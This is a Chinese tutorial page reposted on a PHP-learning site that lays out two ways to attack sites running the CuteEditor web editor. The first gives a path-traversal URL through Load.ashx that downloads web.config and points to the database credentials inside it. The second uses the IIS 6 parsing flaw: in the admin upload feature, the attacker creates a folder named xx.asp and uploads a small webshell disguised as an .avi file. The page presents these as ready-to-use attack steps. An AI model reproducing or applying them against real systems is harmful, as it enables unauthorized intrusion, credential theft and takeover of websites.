网站地图    收藏   

主页 > 后端 > 网站安全 >

cuteeditor编辑器利用方法两则 - 网站安全 - 自学

来源:自学PHP网    时间:2015-04-17 14:47 作者: 阅读:

[导读] 方法1.直接下载load.ashx配置文件http://www.2cto.com /CuteSoft_Client/CuteEditor/Load.ashx?type=imagefile=../../../web.config然后查看一些sql配置信息 从sql数据库连接入手connectionStringsadd na......

方法1.直接下载load.ashx配置文件

http://www.2cto.com /CuteSoft_Client/CuteEditor/Load.ashx?type=image&file=../../../web.config

然后查看一些sql配置信息 从sql数据库连接入手

<connectionStrings>

<add name=”ynncConnectionString” connectionString=”Server=.;DataBase=ynta; UID=sa;PWD=”/>

<add name=”strConn” connectionString=”Server=.;DataBase=ynta; UID=sa;PWD=”/>

</connectionStrings>

<location path=”admin/images”>

<system.web>

<authorization>

<allow users=”?” roles=”Admin,Manager,User”/>

</authorization>

</system.web>

</location>

<location path=”admin”>

<system.web>

<authorization>

<deny users=”?” roles=”Admin,Manager,User”/>

<allow users=”*”/>

</authorization>

</system.web>

</location>

<location path=”admin/YNTA_UpFile”>

<system.web>

<authorization>

<allow users=”?” roles=”Admin,Manager,User”/>

</authorization>

</system.web>

</location>

<location path=”admin/flv”>

<system.web>

<authorization>

<allow users=”?” roles=”Admin,Manager,User”/>

</authorization>

</system.web>

</location>

方法2.2003 iis解析(后台拿webshell)

填加新闻–上传音乐,视频等图标—新建目录xx.asp 然后上传小马x.avi

图片方面因为格式检查严格~!不成功~求突破。


本文来自: 雪域博客

自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习

京ICP备14009008号-1@版权所有www.zixuephp.com

网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com

添加评论